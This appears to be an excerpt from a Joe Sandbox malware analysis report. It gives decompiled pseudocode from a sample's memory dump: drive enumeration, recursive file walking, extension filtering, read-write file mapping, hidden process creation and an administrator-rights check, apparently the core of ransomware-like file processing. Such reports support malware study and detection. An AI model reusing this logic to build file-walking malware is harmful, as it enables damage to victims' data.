                                    • CreateThread.KERNEL32 ref: 0F584099
                                    • WaitForMultipleObjects.KERNEL32(00000000,?), ref: 0F5840DB
                                    • GetTickCount.KERNEL32 ref: 0F5840E1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.298114083.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true
                                    • Associated: 00000003.00000002.298101480.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298127638.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298139854.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298147707.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_f580000_mqsmvj.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CountTick$AllocCreateDriveMultipleObjectsThreadTypeVirtualWait
                                    • String ID: ?:\
                                    • API String ID: 458387131-2533537817
                                    • Opcode ID: d4cec303b186f5f2fdde77e4a29a2dac19d8eea38d6ff3a154c802728047e42d
                                    • Instruction ID: fd7a28090f564a608222304982e78d080365528b895bd94cc6acfd6b22cf9f7f
                                    • Opcode Fuzzy Hash: d4cec303b186f5f2fdde77e4a29a2dac19d8eea38d6ff3a154c802728047e42d
                                    • Instruction Fuzzy Hash: D0514370908301DFC310DF18C984B5BBBE1FF88324F504A2EE989AB391D375A949CB96
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E0F586F40(void* _a4) {
                                    				intOrPtr _v0;
                                    				intOrPtr _v4;
                                    				long _v8;
                                    				intOrPtr _v12;
                                    				void* _v16;
                                    				struct _CRITICAL_SECTION _v40;
                                    				WCHAR* _t12;
                                    				void* _t22;
                                    
                                    				_t12 = VirtualAlloc(0, 0x401, 0x3000, 0x40);
                                    				_t22 = _a4;
                                    				wsprintfW(_t12, L"%c:\\",  *_t22 & 0x0000ffff);
                                    				InitializeCriticalSection( &_v40);
                                    				_v12 = 0x2710;
                                    				_v8 = 0;
                                    				_v4 = 0xffffffff;
                                    				_v0 = 0xffffffff;
                                    				_v16 = VirtualAlloc(0, 0x9c40, 0x3000, 4);
                                    				E0F586DF0(_t22 + 8, _t12,  &_v40,  *((intOrPtr*)(_t22 + 4)), _t22 + 8, _t22 + 0x10);
                                    				VirtualFree(_t22, 0, 0x8000);
                                    				ExitThread(0);
                                    			}











                                    0x0f586f59
                                    0x0f586f5f
                                    0x0f586f6e
                                    0x0f586f7c
                                    0x0f586f90
                                    0x0f586f98
                                    0x0f586fa0
                                    0x0f586fa8
                                    0x0f586fb6
                                    0x0f586fcb
                                    0x0f586fdb
                                    0x0f586fe3

                                    APIs
                                    • VirtualAlloc.KERNEL32(00000000,00000401,00003000,00000040), ref: 0F586F59
                                    • wsprintfW.USER32 ref: 0F586F6E
                                    • InitializeCriticalSection.KERNEL32(?), ref: 0F586F7C
                                    • VirtualAlloc.KERNEL32 ref: 0F586FB0
                                      • Part of subcall function 0F586DF0: lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 0F586E23
                                      • Part of subcall function 0F586DF0: lstrcatW.KERNEL32 ref: 0F586E3B
                                      • Part of subcall function 0F586DF0: FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 0F586E45
                                    • VirtualFree.KERNEL32(?,00000000,00008000,00009C40,00003000,00000004), ref: 0F586FDB
                                    • ExitThread.KERNEL32 ref: 0F586FE3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.298114083.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true
                                    • Associated: 00000003.00000002.298101480.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298127638.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298139854.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298147707.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_f580000_mqsmvj.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Virtual$Alloc$CriticalExitFileFindFirstFreeInitializeSectionThreadlstrcatlstrlenwsprintf
                                    • String ID: %c:\
                                    • API String ID: 1988002015-3142399695
                                    • Opcode ID: c66e06b352bd309b3e23ee20c4ffc7d70e2ff497fafbcf459fad273bf2fa8560
                                    • Instruction ID: 291b2525e64ddbce8bf315f89cba2bc34e9f46a70543ada91606c02c37840372
                                    • Opcode Fuzzy Hash: c66e06b352bd309b3e23ee20c4ffc7d70e2ff497fafbcf459fad273bf2fa8560
                                    • Instruction Fuzzy Hash: BB01D6B0144300BBE7109F20CD8AF173FA8AB44B21F004615FB65AA2C1D7B8951ACB95
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 85%
                                    			E0F582890(WCHAR* __ecx, intOrPtr __edx) {
                                    				long _v8;
                                    				intOrPtr _v12;
                                    				void* _v16;
                                    				void* __ebx;
                                    				void* __edi;
                                    				void* __esi;
                                    				signed int _t14;
                                    				void* _t18;
                                    				void* _t23;
                                    				WCHAR* _t29;
                                    				void* _t34;
                                    				signed int _t35;
                                    				long _t37;
                                    				void* _t38;
                                    				void* _t40;
                                    
                                    				_t29 = __ecx;
                                    				_t28 = 0;
                                    				_v12 = __edx;
                                    				_t34 = CreateFileW(__ecx, 0x80000000, 1, 0, 3, 0, 0);
                                    				if(_t34 == 0xffffffff) {
                                    					L3:
                                    					return 0;
                                    				} else {
                                    					_v8 = GetFileSize(_t34, 0);
                                    					E0F583030(0, _t34, _t35);
                                    					asm("sbb esi, esi");
                                    					_t37 = (_t35 & 0x00000003) + 1;
                                    					_t14 = E0F583030(0, _t34, _t37);
                                    					asm("sbb eax, eax");
                                    					_t18 = CreateFileMappingW(_t34, 0, ( ~_t14 & 0xfffffffa) + 8, 0, 0, 0);
                                    					_v16 = _t18;
                                    					if(_t18 != 0) {
                                    						_t38 = MapViewOfFile(_t18, _t37, 0, 0, 0);
                                    						if(_t38 != 0) {
                                    							_t23 = E0F583030(0, _t34, _t38);
                                    							if(_t23 == 0) {
                                    								_push(_t29);
                                    								_t4 = _t38 + 0x53; // 0x53
                                    								_t29 = _t4;
                                    								_t5 = _t23 + 6; // 0x6
                                    								E0F588400(_t29, _t5);
                                    								_t40 = _t40 + 4;
                                    							}
                                    							_push(_t29);
                                    							_t28 = E0F582830(_v12, _t38, _v8);
                                    							UnmapViewOfFile(_t38);
                                    						}
                                    						CloseHandle(_v16);
                                    						CloseHandle(_t34);
                                    						return _t28;
                                    					} else {
                                    						CloseHandle(_t34);
                                    						goto L3;
                                    					}
                                    				}
                                    			}


















                                    0x0f582890
                                    0x0f582899
                                    0x0f58289b
                                    0x0f5828b1
                                    0x0f5828b6
                                    0x0f5828f9
                                    0x0f582901
                                    0x0f5828b8
                                    0x0f5828c0
                                    0x0f5828c3
                                    0x0f5828ca
                                    0x0f5828cf
                                    0x0f5828d0
                                    0x0f5828d8
                                    0x0f5828e5
                                    0x0f5828eb
                                    0x0f5828f0
                                    0x0f582910
                                    0x0f582914
                                    0x0f582916
                                    0x0f58291d
                                    0x0f58291f
                                    0x0f582920
                                    0x0f582920
                                    0x0f582923
                                    0x0f582926
                                    0x0f58292b
                                    0x0f58292b
                                    0x0f58292e
                                    0x0f58293f
                                    0x0f582942
                                    0x0f582942
                                    0x0f582951
                                    0x0f582954
                                    0x0f58295e
                                    0x0f5828f2
                                    0x0f5828f3
                                    0x00000000
                                    0x0f5828f3
                                    0x0f5828f0

                                    APIs
                                    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,772D82B0,00000000,?,?,0F582C02), ref: 0F5828AB
                                    • GetFileSize.KERNEL32(00000000,00000000,?,?,0F582C02), ref: 0F5828BA
                                    • CreateFileMappingW.KERNEL32(00000000,00000000,-00000008,00000000,00000000,00000000,?,?,0F582C02), ref: 0F5828E5
                                    • CloseHandle.KERNEL32(00000000,?,?,0F582C02), ref: 0F5828F3
                                    • MapViewOfFile.KERNEL32(00000000,772D82B1,00000000,00000000,00000000,?,?,0F582C02), ref: 0F58290A
                                    • UnmapViewOfFile.KERNEL32(00000000,?,?,?,?,0F582C02), ref: 0F582942
                                    • CloseHandle.KERNEL32(?,?,?,0F582C02), ref: 0F582951
                                    • CloseHandle.KERNEL32(00000000,?,?,0F582C02), ref: 0F582954
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.298114083.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true
                                    • Associated: 00000003.00000002.298101480.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298127638.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298139854.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298147707.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_f580000_mqsmvj.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$CloseHandle$CreateView$MappingSizeUnmap
                                    • String ID:
                                    • API String ID: 265113797-0
                                    • Opcode ID: ffb715212ba1b1016c3e9d2017736db529608780650aae35b3ede2d28a36abef
                                    • Instruction ID: ec4abebaa35db9d10f304be953c7a5cccd1725b7aec16680b4e70216dac03bd5
                                    • Opcode Fuzzy Hash: ffb715212ba1b1016c3e9d2017736db529608780650aae35b3ede2d28a36abef
                                    • Instruction Fuzzy Hash: 742104B1A002197FE7107BB49C85F7E7F6CEB85666F100236FD05B2281E7389C1759A1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 97%
                                    			E0F5869B0(WCHAR* __ecx) {
                                    				intOrPtr _v8;
                                    				signed int _t11;
                                    				void* _t20;
                                    				void* _t23;
                                    				signed int _t26;
                                    				signed int _t27;
                                    				intOrPtr _t28;
                                    				void* _t31;
                                    				signed short* _t35;
                                    				WCHAR* _t38;
                                    				WCHAR* _t40;
                                    				void* _t44;
                                    
                                    				_push(__ecx);
                                    				_t38 = __ecx;
                                    				if( *0xf592a60 != 0) {
                                    					_t11 = lstrlenW(__ecx);
                                    					_t40 = _t38 + _t11 * 2 + 0xfffffffe;
                                    					if(_t11 == 0) {
                                    						L7:
                                    						return 1;
                                    					} else {
                                    						while( *_t40 != 0x2e) {
                                    							_t40 = _t40 - 2;
                                    							_t11 = _t11 - 1;
                                    							if(_t11 != 0) {
                                    								continue;
                                    							}
                                    							break;
                                    						}
                                    						if(_t11 != 0) {
                                    							_t23 = VirtualAlloc(0, 4 + lstrlenW(_t40) * 2, 0x3000, 4);
                                    							wsprintfW(_t23, L"%s ", _t40);
                                    							_t35 =  *0xf592a60; // 0x0
                                    							_t28 = 0;
                                    							_v8 = 0;
                                    							if( *_t23 == 0) {
                                    								L20:
                                    								_t29 =  !=  ? 1 : _t28;
                                    								_v8 =  !=  ? 1 : _t28;
                                    							} else {
                                    								_t26 =  *_t35 & 0x0000ffff;
                                    								if(_t26 != 0) {
                                    									_t44 = _t35 - _t23;
                                    									do {
                                    										_t20 = _t23;
                                    										if(_t26 == 0) {
                                    											L16:
                                    											if( *_t20 == 0) {
                                    												goto L19;
                                    											} else {
                                    												goto L17;
                                    											}
                                    										} else {
                                    											while(1) {
                                    												_t27 =  *_t20 & 0x0000ffff;
                                    												if(_t27 == 0) {
                                    													break;
                                    												}
                                    												_t31 = ( *(_t44 + _t20) & 0x0000ffff) - _t27;
                                    												if(_t31 != 0) {
                                    													goto L16;
                                    												} else {
                                    													_t20 = _t20 + 2;
                                    													if( *(_t44 + _t20) != _t31) {
                                    														continue;
                                    													} else {
                                    														goto L16;
                                    													}
                                    												}
                                    												goto L21;
                                    											}
                                    											L19:
                                    											_t28 = 0;
                                    											goto L20;
                                    										}
                                    										goto L21;
                                    										L17:
                                    										_t26 = _t35[1] & 0x0000ffff;
                                    										_t35 =  &(_t35[1]);
                                    										_t44 = _t44 + 2;
                                    									} while (_t26 != 0);
                                    								}
                                    							}
                                    							L21:
                                    							VirtualFree(_t23, 0, 0x8000);
                                    							return _v8;
                                    						} else {
                                    							goto L7;
                                    						}
                                    					}
                                    				} else {
                                    					return 1;
                                    				}
                                    			}















                                    0x0f5869b3
                                    0x0f5869bc
                                    0x0f5869be
                                    0x0f5869d2
                                    0x0f5869d7
                                    0x0f5869dc
                                    0x0f5869f0
                                    0x0f5869fa
                                    0x0f5869e0
                                    0x0f5869e0
                                    0x0f5869e6
                                    0x0f5869e9
                                    0x0f5869ea
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0f5869ea
                                    0x0f5869ee
                                    0x0f586a17
                                    0x0f586a1f
                                    0x0f586a25
                                    0x0f586a2b
                                    0x0f586a30
                                    0x0f586a36
                                    0x0f586a82
                                    0x0f586a89
                                    0x0f586a8c
                                    0x0f586a38
                                    0x0f586a38
                                    0x0f586a3e
                                    0x0f586a42
                                    0x0f586a44
                                    0x0f586a44
                                    0x0f586a49
                                    0x0f586a69
                                    0x0f586a6d
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0f586a4b
                                    0x0f586a50
                                    0x0f586a50
                                    0x0f586a56
                                    0x00000000
                                    0x00000000
                                    0x0f586a5c
                                    0x0f586a5e
                                    0x00000000
                                    0x0f586a60
                                    0x0f586a60
                                    0x0f586a67
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0f586a67
                                    0x00000000
                                    0x0f586a5e
                                    0x0f586a80
                                    0x0f586a80
                                    0x00000000
                                    0x0f586a80
                                    0x00000000
                                    0x0f586a6f
                                    0x0f586a6f
                                    0x0f586a73
                                    0x0f586a76
                                    0x0f586a79
                                    0x0f586a7e
                                    0x0f586a3e
                                    0x0f586a8f
                                    0x0f586a97
                                    0x0f586aa6
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0f5869ee
                                    0x0f5869c0
                                    0x0f5869c9
                                    0x0f5869c9

                                    APIs
                                    • lstrlenW.KERNEL32(00000000,00000010,00000000,00000000,?,0F586AEA), ref: 0F5869D2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.298114083.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true
                                    • Associated: 00000003.00000002.298101480.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298127638.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298139854.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298147707.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_f580000_mqsmvj.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrlen
                                    • String ID: %s
                                    • API String ID: 1659193697-4273690596
                                    • Opcode ID: e3cd12a8c666c89f7728e7ddcafcbb07099c23f151a0f1c14b383fed7ed13a07
                                    • Instruction ID: 9442ac9452c9bb0c8e542145a2bc15fea8f6e6d51cd991a26dfaee94589e9f39
                                    • Opcode Fuzzy Hash: e3cd12a8c666c89f7728e7ddcafcbb07099c23f151a0f1c14b383fed7ed13a07
                                    • Instruction Fuzzy Hash: 9621F632A01225D7D7306B5C9D413B673A8FB85721F458276EC46BB281E7B5AD53C2D0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 84%
                                    			E0F584E10(WCHAR* __ecx) {
                                    				struct _PROCESS_INFORMATION _v20;
                                    				struct _STARTUPINFOW _v92;
                                    				intOrPtr _t15;
                                    				intOrPtr _t16;
                                    				WCHAR* _t25;
                                    
                                    				asm("xorps xmm0, xmm0");
                                    				_t25 = __ecx;
                                    				asm("movdqu [ebp-0x10], xmm0");
                                    				E0F589170( &_v92, 0, 0x44);
                                    				_t15 =  *0xf592a6c; // 0x0
                                    				_v92.hStdError = _t15;
                                    				_v92.hStdOutput = _t15;
                                    				_t16 =  *0xf592a68; // 0x0
                                    				_v92.dwFlags = _v92.dwFlags | 0x00000101;
                                    				_v92.hStdInput = _t16;
                                    				_v92.wShowWindow = 0;
                                    				_v92.cb = 0x44;
                                    				if(CreateProcessW(0, _t25, 0, 0, 1, 0, 0, 0,  &_v92,  &_v20) != 0) {
                                    					CloseHandle(_v20);
                                    					return CloseHandle(_v20.hThread);
                                    				} else {
                                    					return GetLastError();
                                    				}
                                    			}








                                    0x0f584e1c
                                    0x0f584e22
                                    0x0f584e24
                                    0x0f584e29
                                    0x0f584e2e
                                    0x0f584e36
                                    0x0f584e39
                                    0x0f584e3c
                                    0x0f584e41
                                    0x0f584e48
                                    0x0f584e4d
                                    0x0f584e58
                                    0x0f584e77
                                    0x0f584e8d
                                    0x0f584e98
                                    0x0f584e79
                                    0x0f584e83
                                    0x0f584e83

                                    APIs
                                    • _memset.LIBCMT ref: 0F584E29
                                    • CreateProcessW.KERNEL32 ref: 0F584E6F
                                    • GetLastError.KERNEL32(?,?,00000000), ref: 0F584E79
                                    • CloseHandle.KERNEL32(?,?,?,00000000), ref: 0F584E8D
                                    • CloseHandle.KERNEL32(?,?,?,00000000), ref: 0F584E92
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.298114083.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true
                                    • Associated: 00000003.00000002.298101480.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298127638.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298139854.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298147707.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_f580000_mqsmvj.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseHandle$CreateErrorLastProcess_memset
                                    • String ID: D
                                    • API String ID: 1393943095-2746444292
                                    • Opcode ID: 13fe62cef7129230e104a4d2383b6717d6b97bc5fd4bb4c64e1d5febe762b33b
                                    • Instruction ID: 6ca3ca8a7fcf8c385af7b3d77c7f72793dacd1f07f62118ef84623aeab92ddc8
                                    • Opcode Fuzzy Hash: 13fe62cef7129230e104a4d2383b6717d6b97bc5fd4bb4c64e1d5febe762b33b
                                    • Instruction Fuzzy Hash: 08018471E40319ABDB20DFA4DC46BDE7FB8EF04725F104126FA08FA280E7B525548B94
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 63%
                                    			E0F583C70() {
                                    				signed int _v8;
                                    				void* _v12;
                                    				short _v16;
                                    				struct _SID_IDENTIFIER_AUTHORITY _v20;
                                    				int _t13;
                                    				_Unknown_base(*)()* _t15;
                                    				signed int _t16;
                                    
                                    				_v20.Value = 0;
                                    				_v16 = 0x500;
                                    				_t13 = AllocateAndInitializeSid( &_v20, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v12);
                                    				if(_t13 != 0) {
                                    					_t15 = GetProcAddress(GetModuleHandleA("advapi32.dll"), "CheckTokenMembership");
                                    					_t16 =  *_t15(0, _v12,  &_v8);
                                    					asm("sbb eax, eax");
                                    					_v8 = _v8 &  ~_t16;
                                    					FreeSid(_v12);
                                    					return _v8;
                                    				} else {
                                    					return _t13;
                                    				}
                                    			}










                                    0x0f583c79
                                    0x0f583c99
                                    0x0f583ca0
                                    0x0f583ca8
                                    0x0f583cbf
                                    0x0f583cce
                                    0x0f583cd5
                                    0x0f583cd7
                                    0x0f583cda
                                    0x0f583ce6
                                    0x0f583cad
                                    0x0f583cad
                                    0x0f583cad

                                    APIs
                                    • AllocateAndInitializeSid.ADVAPI32(00000000,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 0F583CA0
                                    • GetModuleHandleA.KERNEL32(advapi32.dll), ref: 0F583CB3
                                    • GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 0F583CBF
                                    • FreeSid.ADVAPI32(?), ref: 0F583CDA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.298114083.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true
                                    • Associated: 00000003.00000002.298101480.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298127638.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298139854.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298147707.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_f580000_mqsmvj.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressAllocateFreeHandleInitializeModuleProc
                                    • String ID: CheckTokenMembership$advapi32.dll
                                    • API String ID: 3309497720-1888249752
                                    • Opcode ID: aacb409969a19091ed48a33c872af9294abd4ed8dd41f605e78c4c680bcc02ae
                                    • Instruction ID: 2b1507b6ebf2d3368effc32d115b70a33524dd9144a2034125ae55ac8099ac37
                                    • Opcode Fuzzy Hash: aacb409969a19091ed48a33c872af9294abd4ed8dd41f605e78c4c680bcc02ae
                                    • Instruction Fuzzy Hash: 5AF03C30A50209BBDB009BF4DD0AFAD7BB8FB04716F100595F900B6281E778662A9B51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 94%
                                    			E0F586E69() {
                                    				intOrPtr* _t34;
                                    				intOrPtr* _t38;
                                    				void* _t40;
                                    				WCHAR* _t46;
                                    				void* _t51;
                                    
                                    				do {
                                    					if(lstrcmpW(_t51 - 0x238, ".") != 0 && lstrcmpW(_t51 - 0x238, L"..") != 0) {
                                    						lstrcatW(_t46, _t51 - 0x238);
                                    						if(( *(_t51 - 0x264) & 0x00000010) == 0) {
                                    							 *((intOrPtr*)(_t51 - 0xc)) =  *_t38;
                                    							 *_t38 =  *_t38 + E0F586AB0(_t46, _t51 - 0x264, __eflags, _t40,  *((intOrPtr*)(_t51 + 8)));
                                    							asm("adc [ebx+0x4], edx");
                                    							__eflags =  *((intOrPtr*)(_t38 + 4)) -  *((intOrPtr*)(_t38 + 4));
                                    							if(__eflags <= 0) {
                                    								if(__eflags < 0) {
                                    									L8:
                                    									_t34 =  *((intOrPtr*)(_t51 + 0xc));
                                    									 *_t34 =  *_t34 + 1;
                                    									__eflags =  *_t34;
                                    								} else {
                                    									__eflags =  *((intOrPtr*)(_t51 - 0xc)) -  *_t38;
                                    									if(__eflags < 0) {
                                    										goto L8;
                                    									}
                                    								}
                                    							}
                                    						} else {
                                    							E0F586DF0(lstrcatW(_t46, "\\"), _t46,  *((intOrPtr*)(_t51 - 0x14)),  *((intOrPtr*)(_t51 + 8)),  *((intOrPtr*)(_t51 + 0xc)), _t38);
                                    						}
                                    						 *((short*)( *((intOrPtr*)(_t51 - 0x10)))) = 0;
                                    					}
                                    				} while (FindNextFileW( *(_t51 - 8), _t51 - 0x264) != 0);
                                    				FindClose( *(_t51 - 8));
                                    				return 0;
                                    			}








                                    0x0f586e70
                                    0x0f586e84
                                    0x0f586ea8
                                    0x0f586eb1
                                    0x0f586ee2
                                    0x0f586eed
                                    0x0f586eef
                                    0x0f586ef2
                                    0x0f586ef5
                                    0x0f586ef7
                                    0x0f586f00
                                    0x0f586f00
                                    0x0f586f03
                                    0x0f586f03
                                    0x0f586ef9
                                    0x0f586efc
                                    0x0f586efe
                                    0x00000000
                                    0x00000000
                                    0x0f586efe
                                    0x0f586ef7
                                    0x0f586eb3
                                    0x0f586ec7
                                    0x0f586ecc
                                    0x0f586f10
                                    0x0f586f10
                                    0x0f586f23
                                    0x0f586f2e
                                    0x0f586f3c

                                    APIs
                                    • lstrcmpW.KERNEL32(?,0F58FF48,?,?), ref: 0F586E7C
                                    • lstrcmpW.KERNEL32(?,0F58FF4C,?,?), ref: 0F586E96
                                    • lstrcatW.KERNEL32 ref: 0F586EA8
                                    • lstrcatW.KERNEL32 ref: 0F586EB9
                                      • Part of subcall function 0F586DF0: lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 0F586E23
                                      • Part of subcall function 0F586DF0: lstrcatW.KERNEL32 ref: 0F586E3B
                                      • Part of subcall function 0F586DF0: FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 0F586E45
                                    • FindNextFileW.KERNEL32(00003000,?,?,?), ref: 0F586F1D
                                    • FindClose.KERNEL32(00003000,?,?), ref: 0F586F2E
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.298114083.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true
                                    • Associated: 00000003.00000002.298101480.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298127638.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298139854.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298147707.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_f580000_mqsmvj.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Findlstrcat$Filelstrcmp$CloseFirstNextlstrlen
                                    • String ID:
                                    • API String ID: 2032009209-0
                                    • Opcode ID: 9a09fae8f862e7f6bf8d543c63de2df20a0068f007ce7d4fb94b4b6f7f7cbf47
                                    • Instruction ID: 1920c00e65b94681a648855e302fb06c2d088e33f59247a88c7751042cb7cf3a
                                    • Opcode Fuzzy Hash: 9a09fae8f862e7f6bf8d543c63de2df20a0068f007ce7d4fb94b4b6f7f7cbf47
                                    • Instruction Fuzzy Hash: 7E016D31A0024DAACB21BA60DC48BEE7BB8FF48240F0040A6F905F2111DB359A56DF51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E0F583200(void* __ecx, CHAR* _a4, intOrPtr _a8) {
                                    				char _t5;
                                    				char _t6;
                                    				intOrPtr _t8;
                                    				int _t10;
                                    				CHAR* _t13;
                                    				int _t15;
                                    				void* _t18;
                                    				CHAR* _t21;
                                    				CHAR* _t23;
                                    
                                    				_t23 = _a4;
                                    				_t18 = __ecx;
                                    				_t5 =  *_t23;
                                    				if(_t5 == 0) {
                                    					L4:
                                    					_t6 =  *_t23;
                                    					if(_t6 == 0x7d) {
                                    						goto L10;
                                    					} else {
                                    						_t21 = _t23;
                                    						if(_t6 != 0) {
                                    							while( *_t21 != 0x7d) {
                                    								_t21 =  &(_t21[1]);
                                    								if( *_t21 != 0) {
                                    									continue;
                                    								} else {
                                    								}
                                    								goto L12;
                                    							}
                                    							 *_t21 = 0;
                                    						}
                                    						L12:
                                    						_t8 = _a8;
                                    						if(_t8 != 1) {
                                    							if(_t8 == 2) {
                                    								_t10 = lstrlenA(_t23);
                                    								_t13 = HeapAlloc(GetProcessHeap(), 8, _t10 + 1);
                                    								 *(_t18 + 8) = _t13;
                                    								goto L16;
                                    							}
                                    						} else {
                                    							_t15 = lstrlenA(_t23);
                                    							_t13 = HeapAlloc(GetProcessHeap(), 8, _t15 + 1);
                                    							 *(_t18 + 4) = _t13;
                                    							L16:
                                    							if(_t13 != 0) {
                                    								lstrcpyA(_t13, _t23);
                                    							}
                                    						}
                                    						 *_t21 = 0x7d;
                                    						return 1;
                                    					}
                                    				} else {
                                    					while(_t5 != 0x7d) {
                                    						_t23 =  &(_t23[1]);
                                    						if(_t5 == 0x3d) {
                                    							goto L4;
                                    						} else {
                                    							_t5 =  *_t23;
                                    							if(_t5 != 0) {
                                    								continue;
                                    							} else {
                                    								goto L4;
                                    							}
                                    						}
                                    						goto L19;
                                    					}
                                    					L10:
                                    					return 0;
                                    				}
                                    				L19:
                                    			}












                                    0x0f583205
                                    0x0f583208
                                    0x0f58320a
                                    0x0f58320e
                                    0x0f58321f
                                    0x0f58321f
                                    0x0f583223
                                    0x00000000
                                    0x0f583225
                                    0x0f583226
                                    0x0f58322a
                                    0x0f583230
                                    0x0f583235
                                    0x0f583239
                                    0x00000000
                                    0x00000000
                                    0x0f58323b
                                    0x00000000
                                    0x0f583239
                                    0x0f583245
                                    0x0f583245
                                    0x0f583248
                                    0x0f583248
                                    0x0f58324e
                                    0x0f583270
                                    0x0f583273
                                    0x0f583284
                                    0x0f58328a
                                    0x00000000
                                    0x0f58328a
                                    0x0f583250
                                    0x0f583251
                                    0x0f583262
                                    0x0f583268
                                    0x0f58328d
                                    0x0f58328f
                                    0x0f583293
                                    0x0f583293
                                    0x0f58328f
                                    0x0f583299
                                    0x0f5832a5
                                    0x0f5832a5
                                    0x0f583210
                                    0x0f583210
                                    0x0f583214
                                    0x0f583217
                                    0x00000000
                                    0x0f583219
                                    0x0f583219
                                    0x0f58321d
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0f58321d
                                    0x00000000
                                    0x0f583217
                                    0x0f58323e
                                    0x0f583242
                                    0x0f583242
                                    0x00000000

                                    APIs
